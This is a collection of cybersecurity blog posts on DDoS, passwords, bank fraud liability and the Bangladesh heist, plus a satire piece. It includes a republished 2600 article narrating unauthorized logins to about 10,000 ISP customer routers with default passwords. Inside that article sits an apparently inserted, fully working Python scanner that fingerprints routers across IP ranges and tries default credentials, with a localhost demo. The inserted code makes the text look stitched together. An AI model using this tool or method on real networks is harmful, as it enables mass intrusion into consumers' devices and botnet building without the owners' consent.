
Internet of shitty things!

Brian Krebs is the most reputable name in cybersecurity reporting, and his krebsonsecurity website is the best source of ‘real’ journalism on the subject.

But reputation works both ways: the same thing that makes him popular in some circles makes him unpopular in others. He’s had criminal hackers send him heroin in the mail and even had SWAT teams descend on his home with guns blazing (a phenomenon called swatting!). Reporting on and exposing underground cyber-criminals comes at a price; you don’t piss off darknet crime lords without taking a few hits along the way.

The problem, though, is when those ‘few’ hits turn into a hurricane of web traffic aimed at your server, because that’s exactly what descended on Krebs’ server late last week, when krebsonsecurity was hit by an epic DDoS attack.

DDoS is an acronym for Distributed Denial of Service, which basically means forcing so much traffic onto a single website that it eventually collapses, making it unable to serve the ‘real’ visitors of the site. All websites run on servers with finite capacity, and a DDoS attack is about sending enough traffic to those servers that they eventually fail.

But this DDoS was different, and krebsonsecurity will go down in history as the Hiroshima of DDoS attacks, because for the first time we’re seeing a new type of weapon. One that, once revealed, cannot be un-revealed.

Now, there have been DDoS attacks in the past, but this attack on Krebs was different for 3 reasons.


Hotline Jais is a terrible idea!

Jais recently launched a new mobile app to allow the public to easily report any crimes that contravene syariah laws.

Obviously there are social and legal implications here, which I won’t go into, but we need to understand just how stupid this idea is.

When you ask amateurs to give you security, what you eventually end up with is amateur security.

It’s the reason why maths professors from Ivy League universities are wrongly profiled as terrorists, why breast milk is incorrectly identified as an explosive substance on planes, and why it doesn’t take an evil genius to break into your gated and guarded housing project. Security is hard, and if you entrust it to amateurs, things don’t end well.

Having an ‘app’ where people can report anything that contravenes their morality is a sure-fire recipe for disaster, and I don’t think Jais has the infrastructure or the processes to receive all the complaints and run a proper check on each of them.

And when it has real legal implications for Muslims (and even non-Muslims), they need to take that shit off the Play Store.

Link here.


All your eggs in one basket

Is it wise to use an online password manager? After all, putting your passwords in the cloud seems like a really dumb idea.

But I use a password manager because, while storing stuff in the cloud does present a risk, it’s far riskier and dumber to re-use passwords.

Why do you need a password manager?

Despite the sexiness of zero-day exploits and the hardcore state-sponsored hacking groups we see on the news, the number one way the average person gets hacked is through password compromise (boring!). That’s when hackers guess, or somehow figure out, your password, and then use it to access the various online services you subscribe to.

Most people downplay the risk of this happening because they think they’re not rich enough, or famous enough, to be the target of hackers. But in an era where single breaches compromise millions of accounts, and hackers can automate attacks on cheap cloud servers from Amazon, you’d be surprised what hackers consider a worthwhile target.

But how do hackers get your password?

On occasion they actually guess it, à la ‘the Fappening’, but more commonly they get your passwords by hacking other services. Shockingly, sometimes the easiest way to get your Google password is to hack the dodgy forums and insecure chat rooms that litter the internet, because people re-use the same password there.


The safest place for your money is under the mattress


When I was in school, we joked about people who kept their money under the mattress, as if those who didn’t use banks were less intelligent than people who did. The general thinking was that smart people kept their money in the bank, where it was safe from theft, fire and flood, while still collecting interest.

In the 80’s this was a compelling argument, when interest rates were high and banks really did provide security, but is that thinking still applicable today?

In June of 2000, Maybank launched its ‘new’ internet banking platform, Maybank2u, which allowed customers to do their banking online, outside of traditional branches or even ATMs. A few years later it began offering online purchases, and soon after the mobile app was launched.

But while online banking platforms brought convenience, they also introduced new security threats, and it wasn’t clear whose job it was to secure against those new threats, or who would be liable for the inevitable financial losses.

Was the bank going to assume liability, just as it did before, or would it be the account holder, or possibly a mixture of both?

The answer depends on who gets attacked, because not all attacks are equal.

Not all attacks are equal

There are two types of attack: one where the bank itself is attacked, and another where the account holder is targeted instead.

When someone walks into a bank with the threat of violence and walks out with $30,000 of the bank’s cash, the bank absorbs all the losses. After all, that’s why your money is in their safe and not under the mattress.

But there exists another class of attack, customer impersonation, where the attacker isn’t threatening violence or even ‘attacking’ the bank, but trying to fool the bank into believing they are the rightful account holder. In other words, the attacker is trying to impersonate you to get to your money.

And in the digital world, customer impersonation is far more common. Consider the case of ATM fraud.

ATMs identify a user by verifying their ATM card and then prompting them for a PIN. More specifically, the ATM first authenticates the inserted card (is this card genuine?) and then asks the user for the PIN (is this person the account holder?). Once both checks pass, it grants the user access to the account.

Hence if an attacker manages to steal your card and knows your PIN, the ATM has no way to differentiate between you and the attacker. Anyone could take money from your account with just your ATM card and PIN; in contrast, robbers attacking a bank are taking the bank’s cash, not yours.

Credit card fraud is another prime example, but at least in Malaysia cardholders have their liability capped at RM250, provided they report the lost card within a ‘reasonable’ amount of time. Debit cards and ATM cards are not protected in the same way, which is strange, because the poorer sections of society who need more protection usually have debit rather than credit cards.

But even credit card users need to be wary, because changes in the liability model are bound to happen when we introduce Chip and PIN. (read more here)

To summarize, customer impersonation isn’t the same as a bank robbery. When the bank issues you credentials (like PINs, passwords or ATM cards), the responsibility to secure those credentials is yours, and if those credentials are compromised, you’ll have to shoulder some of the financial losses as well.


Michael Hayden: some interesting points

Some interesting points:

  1. Non-nation-state actors now pose a significant threat to nation states
  2. Historical threats usually associated with bad nation states can now be executed by non-nation-states
  3. The Industrial Era was about a consolidation of power; in the past only the Government could run something as complex as a phone network
  4. The Post-Industrial Era is about the decentralization of power; today, modern economies privatize and decentralize important things like the phone network. (my comment: The internet is the epitome of this, a fully decentralized network controlled by no single entity)
  5. American foreign policy, power projection and defence have been fully focused on hard power against nation states (hard power = men with guns)
  6. In order to address the threat of non-nation-states, the US government has pivoted its tactics
    • Yesterday: Killing someone from a foreign army in a designated war-zone
    • Today: Drone strikes on enemy combatants that aren’t fully recognized
    • Yesterday: Capturing foreign combatants and imprisoning them
    • Today: Guantanamo
    • Yesterday: Intercepting enemy communications, disabling and sabotaging
    • Today: The programs that Edward Snowden revealed
    • (my comment: I don’t think the full surveillance of domestic internet traffic was a good idea)
  7. We’re seeing the melting down of the post-WW2 and post-WW1 global order, and maybe even the breakdown of Westphalian nation-states…ISIS is a response to Westphalian ideas of separation of church and state.
  8. There is a fundamental similarity between what Christian Europe faced in the 16th-17th century and what the Middle East faces today; both are debating the relationship between religion and power.
  9. Christian Europe had the answer of separating them, and we call this separation ‘modern’!
  10. There is no guarantee that Islam in the Middle East will come to the same conclusion, i.e. it may never become modern.
  11. Less important stuff about nuclear power: how Russia is adopting a nuclear-first option and considering it de-escalatory. Hayden doesn’t like the Iran Deal, and isn’t a big fan of Pakistan.
  12. American foreign policy makers like Hayden are more concerned with Chinese failure than with Chinese success. Political, economic and social factors may hamper the growth of China, but a failure of the regime is going to be a massive problem for the world, while a success for China would have a relatively smaller impact that can be folded into the world order.
  13. The Chinese claims on the 9-dash line are a nationalistic approach to remedying the economic slowdown (Hayden’s opinion); what’s more interesting is that this is a diplomatic error, and ASEAN countries are running back to America to balance China’s power.
  14. Fundamentally though, China has no reason to be an enemy of the US
  15. His last slide on American foreign policy, the 4 different president types; as a fan of Wilson and a World War 1 history freak, I thought that was awesome!! One of the best historically precise frameworks for understanding US foreign policy that isn’t based on just the last 20 years
  16. Only one country supports targeted killings by the US: Israel.

Anonymity and IP addresses


This week, I’ll put the final touches on my move from Malaysia to Singapore.

So, I felt it would be a good idea to read through some Singaporean tech articles to see how tech events played out on the little red dot, and offer some unsolicited and completely useless advice on them.

It wasn’t easy sifting through a boat-load of gadget reviews masquerading as tech journalism (I guess some things are the same in every country), but underneath the hundreds of phone reviews and fibre broadband comparisons, I found an interesting little report on illegal downloads.

The Singapore Straits Times reports that:

A local law firm that started proceedings to go after illegal downloaders in Singapore on behalf of two Hollywood studios said it will cooperate with the local authorities to ensure no abuse of process.

It follows a rare intervention by the Attorney-General’s Chambers (AGC) in civil applications made by Samuel Seow Law Corp (SSLC) in the High Court last month.

“We will work with the local authorities to ensure that there will be no unnecessary alarm to consumers who receive the letters of demand we plan to send out,” Mr Samuel Seow, managing director of SSLC, told The Straits Times yesterday.

This is just a re-hashed version of what happened last year in Singapore, when the same law firm went after downloaders of another movie; the difference is that this time they’ll be doing it under the watchful eye of the AGC.

There is something to be said here about copyright-trolling, the abuse of power and the bullying tactics usually involved. But we’ll leave that discussion for another day.

Today, I want to explore anonymity a little, and the mistaken notion many people have about what it is.


Random thoughts

You’ve probably heard of the hackers who almost got away with $1 billion, only to be thwarted by a typo. (if it weren’t for those meddling keyboards!)

What you probably didn’t hear was that they had already wired $100 million to themselves, and are assumed to have pocketed anywhere from $21 million to $81 million in cold hard cash.

Sure, billions is more than millions, but a single hack that returns $21 million is a good pay-day by anyone’s standards.

The group managed to hack into the Bangladesh central bank and gained access to specific machines on its network. From there they sent payment instructions over the SWIFT network to transfer nearly $1 billion, all from a bank with just $28 billion in foreign exchange reserves.

These were not two-bit hackers who were foiled by typos; this was a well-targeted attack, and it would probably have succeeded even if the bank had upgraded its switches from $10 D-Links to $100,000 Cisco routers. The BAE report on the breach made for some interesting bed-time reading, but what really struck me was that the hackers were smart enough to suppress the print-outs of payment confirmations, thereby ensuring no bank employee knew of the breach.

Each payment instruction generates a paper print-out for employees to verify physically, but because that print-out was generated by the same compromised software, it was trivial to suppress.

But hacking is one thing; knowing how to move the money anonymously through a heavily regulated banking system is another.

The hackers had figured out that the best way to smuggle out millions of dollars was via casinos in the Philippines, which aren’t covered by anti-money-laundering laws. This knowledge isn’t something that appears on last week’s Jeopardy, or a question you pose on Reddit; it’s something only insiders know about.

Oh, and by the way, another $20 million was routed to Sri Lanka, suggesting there are avenues to launder money out of the system via that island nation as well.

But just who are these sophisticated hackers?

The Philippine senators who held a hearing on the incident suggested that the perpetrators ‘could’ be Chinese. And while there’s probably a conflict of interest in their statement (nobody wants to admit that there are criminals within their own borders), the evidence does seem to suggest it’s at least a likelihood.

And if I were to put on my tin-foil hat for a while, we might be able to correlate this attack to something that occurred late last year. Keep in mind, though, that this is venturing deep into crazy-cat-lady territory, and you have been warned.

So with that warning, let me take you back to good ol’ 2015.

In September of that year, President Obama and President Xi reached a ‘broad agreement’ that both nations would no longer hack each other for ‘commercial purposes’. Nation-level espionage and intelligence gathering was still OK, but intentionally targeting corporations for their intellectual property was not.

Of course, the agreement was a bit vague on specifics: if Chinese hackers were to target Lockheed Martin to obtain the designs for the F-35 fighter, would that be considered commercial?

But overall the agreement was clear that both countries would not use hacking to advance their commercial interests. Keep in mind that both countries vehemently denied they had ever done this, so in essence the statement was merely formalizing something both countries had always denied doing, sort of like saying we promise never to do the things we never did in the first place.

To give you a flavor of corporate espionage, I recommend reading a brilliant post titled “Stealing White” by Del Quentin Wilber at Bloomberg. It’s a long read (almost 4000 words), involving a Malaysian trying to steal the secrets of titanium dioxide production from DuPont. Apparently titanium dioxide makes a perfect white, the envy of all other whites, but the plot to steal the manufacturing secrets of this perfect white is elaborate enough to make Wile E. Coyote green with envy, and just like in the cartoons, it fails.

The Bloomberg piece concludes with an interesting point “the Chinese may have gotten what they needed directly from the chemical company. Newly filed court documents reveal that the FBI motel raid found evidence DuPont’s computers had been hacked.”

So elaborate espionage didn’t work as effectively as simply hacking into the source and getting it directly, and for a long time it was assumed that these breaches were executed by hackers from the Chinese government itself. Think of it as a special arm dedicated to corporate espionage.

Of course, let me re-iterate that this is merely hypothetical, and let’s also not forget that the Snowden leaks suggest the NSA was also in the corporate espionage game, spying on corporate entities like Brazil’s Petrobras.

And here’s where the tin-foil comes in.

If China did indeed have a corporate espionage arm (not saying it did), and that arm was disbanded back in September due to the agreement with the US, what would happen exactly?

Well, you’d think hundreds (if not thousands) of well-trained hackers who specialized in breaching corporate networks would soon be out of jobs. And since hacking, especially government-level hacking, isn’t exactly a generic skill set you can use to job-hop around, the most likely scenario is that these hackers soon become freelancers.

And freelancers sooner or later coalesce into well-organized teams with high levels of knowledge and expertise.

But what kind of heist could a group of well-trained, highly skilled, out-of-a-job hackers pull off?

Hypothetically, they could infiltrate a financial organization and start routing money to themselves. Maybe? Identifying flaws in the global monetary system and using them to steal about $1 billion from a bank in Bangladesh?

Just maybe.



2600 article

*A republication of my article in 2600, the hacker magazine*

Greetings from Malaysia.

This is my first time writing to 2600, although I’ve been a Kindle subscriber for more than 2 years now.

For my first article, I hoped to write about a little hacking expedition I embarked on a couple of months back, to help me improve my coding skills as well as learn more about local internet users.

Malaysia got onto the internet scene much later than most developed countries; our first ISP was only founded in 1992, and even then it was pretty much exclusively dial-up. Soon the local telecom company, Telekom Malaysia (TM), got into the ISP business and basically killed every other player, because as the incumbent government-owned telecommunications company, it alone had access to the phone lines of every Malaysian household. Until very recently, phone lines in Malaysia were owned by the Federal government through Telekom Malaysia, and it was only in the late 90’s that a privatisation plan opened that up.

During the days of dial-up over PSTN, and even after ADSL connectivity (which still ran over PSTN lines), TM held a monopoly over all internet subscribers in the country, simply because it owned the phone lines. Other ISPs struggled to penetrate the market, because their offerings couldn’t compete with the scale and unfair advantage of TM.

Fortunately, that all changed when TM laid down fibre-optic cables. As part of the deal, TM secured a government subsidy to fund the fibre infrastructure but was forced to allow other ISPs to utilize the last mile. In theory this would increase competition and provide a more level playing field, which it did. But TM was slow in opening up the last mile, and managed to get a head start of around 400,000 subscribers before any other ISP began to offer a fibre-to-the-home internet connection.

Why am I telling you this?

Because TM doesn’t really prioritize security, and I discovered a near-perfect storm of security lapses that may prove costly to TM at some point.

As a ‘legacy’ ISP in the country, TM was around when IP addresses were cheap, and IPv4 exhaustion was a prediction rather than a reality. Hence it managed to secure for itself nearly 2.5 million IP addresses. This abundance of addresses meant that TM gives all its customers a public-facing internet IP by default, something all other ISPs in Malaysia offer only on request of the subscriber (the alternative being a private address behind carrier NAT). I won’t go into the details of NAT here, but you can Google it if you’re interested.

Secondly, as part of a fibre subscription, TM provides a modem and WiFi router, which is nothing out of the ordinary, except that TM sourced all its routers from just 2 manufacturers, and each manufacturer provided only 1 router model. From a security standpoint, having an entire population on a single device isn’t a good thing, because a single exploit could take them all out at once, akin to the super-viruses we hear about that could make entire crops extinct because there’s so little genetic biodiversity in industrial agriculture.

Thirdly, TM provides a TV box for free and paid channels streamed to your TV. The problem is that the TV box requires a complex VLAN segmentation and setup on the router, meaning most third-party routers won’t support the TM fibre offering. This forced most (or all) TM subscribers to continue using whatever router TM provided them in the first place, without the ability to swap the router for a more secure or feature-rich one.

All in all, this meant that all of TM’s 600,000 fibre subscribers (at the time of writing) were connected directly to the internet via a public IP, and most of them continued to use one of the two routers supplied by TM.

So far, nothing too exceptional here, except for two last bits. All the routers were configured to allow access from the WAN interface (i.e. you could configure the router from the internet), and all the routers were set up with one of 5 different username/password combinations by default. The default passwords (as you may have guessed) were rarely changed, and most users were left completely vulnerable to attack on a device they never even considered would be a target.

In 2007, while the fibre offering was still very new, several hackers in Malaysia alerted TM to the ‘flaw’ in their operating model, but TM maintained that the WAN interface was necessary for ‘maintenance and support’, although they did promise to change all passwords to a unique password per router. So here we are in 2015, and I wanted to see just how honest TM had been in keeping that promise.

First I had to get the list of IP addresses that belong to TM; a quick Google search revealed that TM is AS4788. AS stands for Autonomous System, a network under a single administrative control that is announced to the rest of the internet via BGP. BGP is the Border Gateway Protocol, which defines how IP prefixes are routed between ASes, and the great thing about it is that all this information is public, meaning you can easily determine the prefixes TM announces, and hence its IP addresses.

Once I had the list of IP addresses I quickly created a Python script to loop through each individual IP and grab the HTTP headers of the device on that IP (if there was one in the first place). I queried only port 8080, to save time. Since TM had only 2 router models, it was pretty trivial to check the HTTP headers and see if the IP was hosting a vulnerable TM router. A more professional approach would be to use zmap or Shodan, but creating your own scripts has its advantages when you’re learning.

IP scanning was easy, and determining whether a router was indeed listening on port 8080 of a specific IP address wasn’t a tall hurdle to cross. The much harder part was to actually test the hypothesis that most of the routers still used the default usernames and passwords. This meant I had to actually POST login data to the page from my Python script. This isn’t usually a difficult task, but the routers’ web interfaces relied on a large amount of JavaScript, and that just threw my Python scripts into a tail-spin.

Try as I might, I couldn’t get it working using just Python. Eventually I gave up trying to navigate the router’s homepage, but then I found Selenium.

Selenium is a tool that allows you to “create robust, browser-based regression automation suites and tests”; in other words, Selenium allows you to control a browser like Firefox or Chrome from a Python script. This was the holy grail, because the web browser would take care of all the JavaScript nastiness for me, and now I could go deeper into the router configuration settings and poke around to determine other things, like whether people even bother to change their WiFi SSID and password.

But Selenium has a performance drawback: a single Python script querying a webpage takes a couple of MB of RAM, but an entire instance of Firefox kept open could consume a few hundred megabytes, which severely limited my ability to scale the scanning. Even after discovering the tool, I tried to go back to just native Python, but that JavaScript stuff just threw me off.

Eventually, I wrote a whole script in Python that would scan an IP range, determine if a router was present at the end of the IP (on port 8080), and then pass that to another script that would use Selenium to drive a Firefox browser to visit the router’s webpage, try the handful of default username/passwords and determine if any of them worked. And they DID!!
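The two-stage pipeline described above (expand the AS’s prefixes into hosts, fingerprint whatever answers on port 8080, then try a short list of default credentials against anything that looks like the target router) is modelled below in plain Python. This is an added example, not the author’s original scripts or anything from 2600: the router signatures, the default credential list, the `/login` form and the field names are all hypothetical, and the only “router” it talks to is a constructed stand-in served from localhost so the whole thing runs offline. Because the stand-in has no JavaScript, a plain `urllib` POST replaces the Selenium step; against the real interfaces described above you would swap `try_defaults` for a browser-driven login and keep the rest.

```python
"""Offline model of an IP-range scan, HTTP fingerprint and default-credential check.
Added example; all router details and credentials are assumptions, not TM's."""
import ipaddress
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs
from urllib.request import Request, urlopen

# Hypothetical Server-header substrings for the two router models (assumption).
ROUTER_SIGNATURES = {"ModelA": "HypotheticalRouterA/1.0", "ModelB": "HypotheticalRouterB/2.1"}
# Hypothetical default credential pairs to try, in order (constructed list).
DEFAULT_CREDS = [("admin", "admin"), ("admin", "password"), ("user", "user")]


def expand_prefixes(prefixes):
    """Turn announced prefixes (e.g. from a BGP looking glass for an AS) into host addresses."""
    for prefix in prefixes:
        for ip in ipaddress.ip_network(prefix, strict=False).hosts():
            yield str(ip)


def fingerprint(server_header):
    """Map an HTTP Server header onto a known router model, or None if it does not match."""
    for model, signature in ROUTER_SIGNATURES.items():
        if signature in (server_header or ""):
            return model
    return None


def probe(base_url, timeout=2.0):
    """GET the device's page and return its Server header; None if nothing is listening."""
    try:
        with urlopen(Request(base_url, method="GET"), timeout=timeout) as resp:
            return resp.headers.get("Server")
    except HTTPError as err:          # 4xx/5xx still carries headers worth fingerprinting
        return err.headers.get("Server")
    except OSError:                   # connection refused, timeout, unreachable
        return None


def try_defaults(base_url, creds=DEFAULT_CREDS, timeout=2.0):
    """POST each default pair to the hypothetical /login form; return the first accepted pair."""
    for user, password in creds:
        req = Request(base_url + "/login", method="POST",
                      data=f"user={user}&pass={password}".encode(),
                      headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with urlopen(req, timeout=timeout) as resp:
                if resp.getcode() == 200:
                    return (user, password)
        except HTTPError:             # 401 (or anything else non-2xx) means rejected: try the next pair
            continue
        except OSError:
            return None
    return None


def scan(targets, port=8080):
    """Stage 1 fingerprints every host; stage 2 runs only against recognised routers."""
    results = {}
    for ip in targets:
        base = f"http://{ip}:{port}"
        model = fingerprint(probe(base))
        if model is None:
            continue
        results[ip] = (model, try_defaults(base))
    return results


# --- Constructed stand-in for one vulnerable router, so the pipeline can run offline ---
class FakeRouter(BaseHTTPRequestHandler):
    server_version = "HypotheticalRouterA/1.0"   # what fingerprint() keys on
    sys_version = ""

    def do_GET(self):
        self.send_response(200)
        self.end_headers()

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        accepted = form.get("user") == ["admin"] and form.get("pass") == ["password"]
        self.send_response(200 if accepted else 401)
        self.end_headers()

    def log_message(self, *args):     # keep the demo quiet
        pass


def start_fake_router():
    srv = HTTPServer(("127.0.0.1", 0), FakeRouter)   # port 0: let the OS pick a free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo():
    """Scan only the localhost stand-in; returns {ip: (model, accepted_credentials)}."""
    srv = start_fake_router()
    try:
        return scan(["127.0.0.1"], port=srv.server_address[1])
    finally:
        srv.shutdown()


if __name__ == "__main__":
    print(demo())
```

The split into `probe` and `try_defaults` matters for scale: the cheap header fetch runs against every address in the range, and the expensive login attempts (a whole browser per worker, in the author’s setup) only run against the small fraction that fingerprint as the target device.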

Of course, while I was in, I poked around to determine things like WiFi SSIDs, etc., but mostly for fun, and I made it a point not to change any setting on the router.

But there’s no way I could scale all of this on my home PC, or even my laptop. So I decided to host this in the cloud, and chose to use Amazon, specifically a Windows instance on Amazon.

Initially I decided to host this in Singapore, which made sense since I was visiting Malaysian IPs, but then I realized that Amazon’s Oregon data center had much cheaper rates than the Singapore one, so I changed my mind and hosted in Oregon instead. In some cases this was a 20% reduction in cost, at the expense of ‘slightly’ more latency, but my application wasn’t latency-sensitive as much as I was price-sensitive 🙂

Then, in true cheap-skate fashion, I decided to toy with Amazon spot instances. This is a special deal from Amazon where they lease unutilized machines to the highest bidder, and you can get them for nearly 50% of the price of the ‘on-demand’ Amazon instance. The only downside is that Amazon reserves the right to terminate your instance at any time, but from my experience of using them, and from the blogs I read, the chances of that happening were pretty slim.

I’ve run nearly 10 of these so far, and every time I spin up a spot instance, it’s never been auto-terminated. Pretty decent deal; the only real downside is that a spot instance usually takes about 3-5 minutes to launch, due to the bid processing. But other than that it’s as good as an on-demand instance 🙂

With a very powerful Amazon instance that had a large amount of RAM, I could spin up a large number of instances of Firefox to do my bidding. Using a simple database to ensure the instances weren’t visiting the same IP addresses, I was able to automate the whole process of ‘visiting’ TM routers with ease.

Eventually, a single large Amazon instance (procured as a spot instance) was able to hack through 10,000 routers in less than 12 hours for under $10.00. Quite a good return on investment if you’re looking to create your own little botnet army.

TM has especially dropped the ball here; they now have at least 10,000 vulnerable routers floating on their network, waiting to be owned by the next Lizard Squad characters. I could easily have configured my script to turn off the WAN interface on the router, to limit people’s exposure, but I thought better of making changes on a host system without the owner’s explicit permission.

Hopefully, if you’re from Malaysia and a TM subscriber, now you know, and you can check that yourself.

Selamat Tinggal from Malaysia.


Two years on, teaching coding in schools declared a success

KLANG: Two years on, the pilot initiative to teach coding and digital security as an SPM subject has been touted as a resounding success, and the government is mulling a move to make it compulsory by 2020.

The announcement shocked parents, as out of the 10,000 students who took part in the pilot program, only 10 had scored an A, while the rest had failed with a grade of F.

Education Minister, Dato’ Seri Java, said that this reflects the current IT market, where out of 10,000 security consultants, only 10 will ever give you good advice.

“We benchmarked against the industry, and set the grading curve accordingly, so only 10 students getting an A was the intention!! We can’t have cases where students just memorize a textbook and then score an A; this is not History or Geography, this is an important subject,” he said, while further mocking drama and English literature under his breath.

Deputy Director of Education Perl Ramachandran further added that instead of focusing on the 9,990 students who failed, the public should instead focus on the ‘A’ students who showed exemplary work and were ‘bright spots’ in the dark abyss which is the Malaysian education system.

One such exemplary student was 17-year-old lass Siti Pintu bt. Belakang, who had managed to install a backdoor into the MOE exam system and download the question paper days before the exam. A backdoor is an application that allows an attacker unfettered access to the compromised system, and Siti managed to code one from scratch specifically for this purpose.

Already Russian cyber-criminal organizations are offering her scholarships to prestigious universities, Perl further added.

Then there was Godam a/l Rajakumar, who, instead of stealing exam papers, simply hacked into the MOE grading system and gave himself an ‘A’.


More security theatre

So now only actual travellers will be allowed into airports, and everybody else, from your mother to your 3rd aunty twice removed, has to say their teary goodbye at home rather than at the airport KFC.

But why?

So that terrorists will now have to buy a ticket in order to blow up the airport? I can picture it now: “Al-Qaeda attempt to bomb KLIA foiled due to lack of funds for ticket purchase”.

Do these people even consider just how easy it is to circumvent some of the ridiculous ‘security measures’ they put in place these days? If all it takes for a terrorist to gain entry into an airport is a plane ticket, it’s not a very tall order for them to go out and buy one, or just print a fake copy good enough to fool the security officers.

We’d be spending countless man-hours on security personnel at entry points scanning through useless documents, with no real security in return.

What a waste–just like those women only KTM coaches that do absolutely nothing.